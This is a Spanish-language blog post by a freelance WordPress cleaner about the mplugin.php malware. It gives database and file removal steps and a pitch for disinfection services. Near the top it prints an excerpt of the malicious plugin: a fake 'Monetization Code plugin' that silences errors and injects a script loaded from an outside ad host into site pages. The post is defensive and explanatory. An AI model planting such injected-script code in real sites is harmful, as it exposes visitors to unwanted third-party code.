Malware mplugin.php en WordPress

El malware mplugin.php en WordPress es una forma de código malicioso que se utiliza para comprometer la seguridad de sitios web que utilizan el sistema de gestión de contenidos (CMS) WordPress.

¿Qué hace el malware mplugin.php en WordPress?

Este malware ha venido propagándose en diversos sitios creados con WordPress a lo largo del año 2020. Sin embargo, recientemente su presencia ha estado aumentando de manera significativa.

El malware mplugin.php a menudo se instala en sitios web de WordPress a través de vulnerabilidades en los complementos, temas o versiones desactualizadas de WordPress. Los hackers utilizan estas vulnerabilidades para explotar los sitios web y colocar el malware mplugin.php en ellos.

Default
0
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
 
/**
* Plugin Name: Monetization Code plugin
* Description: mplugin Shows cusom codes to display your ad codes.
* Author: aerin Singh
* Version: 1.0
*/
error_reporting(0);
ini_set('display_errors', 0);
$plugin_key='eac22da1027d80a464360b731f14c50b';
$version='1.2';
...
$ad_code='
<script>
(function(__htas){
var d = document,
    s = d.createElement(\'script\'),
    l = d.scripts[d.scripts.length - 1];
s.settings = __htas || {};
s.src = "\/\/tidy-mark.com\/c\/D.9D6\/bA2D5hlJSnWaQf9AN\/DsEP0\/MCTdgo2cN-i\/0\/0oM\/T\/Q\/xoOsDJYX3v";
l.parentNode.insertBefore(s, l);
})({})
</script> ';
 

Una vez que se instala en un sitio web, el malware mplugin.php puede causar varios tipos de daños, como la inyección de contenido malicioso en el sitio, la recopilación de información confidencial del usuario o el control remoto del sitio web.

Proteger su sitio web de WordPress contra el malware mplugin.php

Para proteger su sitio web de WordPress contra el malware mplugin.php, se recomienda mantener siempre actualizado el CMS, los complementos y los temas, y utilizar herramientas de seguridad y medidas preventivas como la autenticación de dos factores, el cifrado de datos y la copia de seguridad regular del sitio web. Si sospecha que su sitio web ha sido infectado con el malware mplugin.php, es importante tomar medidas inmediatas para eliminarlo y proteger su sitio web.

Cómo solucionarlo definitivamente el malware mplugin.php en WordPress

Para resolver definitivamente este problema de malware en tu sitio web de WordPress, sigue estos pasos detallados:

Paso 1: Acceder a la base de datos

Inicia sesión en el panel de control de tu hosting web y busca la herramienta para administrar bases de datos, como PHPMyAdmin.

Paso 2: Edita la tabla wp_options

Dentro de PHPMyAdmin, busca la tabla llamada wp_options. Si has usado un prefijo de tabla diferente durante la instalación, buscará algo como prefijo_options.

Paso 3: Elimina la entrada del malware

Encuentra la entrada en la tabla wp_options llamada active_plugins. Debería tener un contenido similar al siguiente (ejemplo):

Default
0
1
2
 
a:16:{i:0;s:27:"wp-rocket/wp-rocket.php";i:1;s:36:"contact-form-7/wp-contact-form-7.php";i:2;s:11:"mplugin.php";i:3;s:27:"woocommerce/woocommerce.php"; ...
 
Debes eliminar la parte correspondiente a «mplugin.php» manteniendo el formato del arreglo. Quedaría así:

Default
0
1
2
 
a:16:{i:0;s:27:"wp-rocket/wp-rocket.php";i:1;s:36:"contact-form-7/wp-contact-form-7.php";i:3;s:27:"woocommerce/woocommerce.php"; ...
 

Paso 4: Modifica el campo site_transient_update_plugins

Encuentra el campo site_transient_update_plugins en la misma tabla. Debería tener un contenido como este (ejemplo):

Default
0
1
2
 
O:8:"stdClass":5:{s:12:"last_checked";i:1598414385;s:7:"checked";a:16:{s:27:"wp-rocket/wp-rocket.php";s:3:"2.0";s:36:"contact-form-7/wp-contact-form-7.php";s:3:"5.2";s:11:"mplugin.php";s:3:"1.0";s:32:"woocommerce/woocommerce.php"; ...
 
Elimina la parte correspondiente a «mplugin.php» manteniendo el formato del objeto. Quedaría así:
Default
0
1
2
 
O:8:"stdClass":5:{s:12:"last_checked";i:1598414385;s:7:"checked";a:16:{s:27:"wp-rocket/wp-rocket.php";s:3:"2.0";s:36:"contact-form-7/wp-contact-form-7.php";s:3:"5.2";s:32:"woocommerce/woocommerce.php"; ...
 

Paso 5: Elimina los archivos maliciosos

Accede a los archivos de tu instalación de WordPress a través de FTP o el administrador de archivos en tu hosting. Navega a la carpeta /wp-content/plugins y elimina los archivos mplugin.php y admin_ips.txt.

Paso 6: Actualizar el software

Asegúrese de que el software de WordPress, los complementos y los temas estén actualizados a la última versión. Las actualizaciones de software a menudo incluyen parches de seguridad que pueden ayudar a prevenir futuras infecciones de malware.

Paso 7: Cambiar contraseñas

Cambie todas las contraseñas de acceso al sitio web, incluidas las contraseñas de los usuarios y las contraseñas de la base de datos. Utilice contraseñas seguras y complejas que sean difíciles de adivinar.

Paso 7: Añadir medidas de seguridad adicionales

Considere instalar un complemento de seguridad de WordPress adicional para ayudar a proteger su sitio web de futuros ataques de malware. También puede considerar agregar medidas de seguridad adicionales, como autenticación de dos factores, monitoreo de archivos, y limitación de intentos de inicio de sesión.

Una vez que haya realizado todos estos pasos, su sitio web de WordPress debería estar libre de malware mplugin.php y protegido contra futuros ataques de malware.

Recuerda: Antes de realizar cualquier cambio en la base de datos, es una buena práctica realizar una copia de seguridad completa de tu sitio web para evitar cualquier problema.

Este procedimiento eliminará el malware de tu sitio web, pero también es importante investigar cómo se introdujo el malware en primer lugar para asegurarte de que tu sitio esté protegido en el futuro. Si no te sientes cómodo realizando estos pasos, puedo ayudarte.

Servicios de desinfección WordPress

Si necesitas ayuda en la desinfección del malware mplugin.php o en el mantenimiento de tu página web puedo ayudarte.

CONTACTO

Servicios de desinfección de malware mplugin.php

Ofrezco servicios de desinfección de malware mplugin.php en WordPress para ayudar a proteger su sitio web y garantizar su seguridad. Como Freelancer, me dedico a la limpieza de sitios web de WordPress y ofrezco una solución rápida y efectiva para eliminar el malware mplugin.php y proteger su sitio web contra futuros ataques.

Mis servicios incluyen:

  1. Escaneo de malware: Realizo un escaneo exhaustivo de su sitio web de WordPress para detectar y eliminar cualquier rastro de malware mplugin.php.
  2. Limpieza de malware: Utilizo las mejores prácticas de seguridad para limpiar su sitio web de WordPress de malware y garantizar que su sitio web esté protegido contra futuros ataques.
  3. Actualización de software: Actualizo su sitio web de WordPress, los complementos y los temas a la última versión para garantizar que se hayan corregido todas las vulnerabilidades conocidas.
  4. Seguridad adicional: Agrego medidas de seguridad adicionales, como autenticación de dos factores, monitoreo de archivos y limitación de intentos de inicio de sesión, para proteger su sitio web contra futuros ataques de malware.
  5. Copia de seguridad: Realizo una copia de seguridad completa de su sitio web antes de realizar cualquier cambio en el sitio. Si algo sale mal, puede restaurar el sitio web a su estado anterior.

Como Freelancer, tengo experiencia en la limpieza de sitios web de WordPress y garantizo un servicio de calidad y resultados efectivos. Si necesita ayuda para limpiar su sitio web de WordPress de malware mplugin.php, no dude en contactarme para obtener más información sobre mis servicios. Estoy aquí para ayudar a proteger su sitio web y garantizar su seguridad.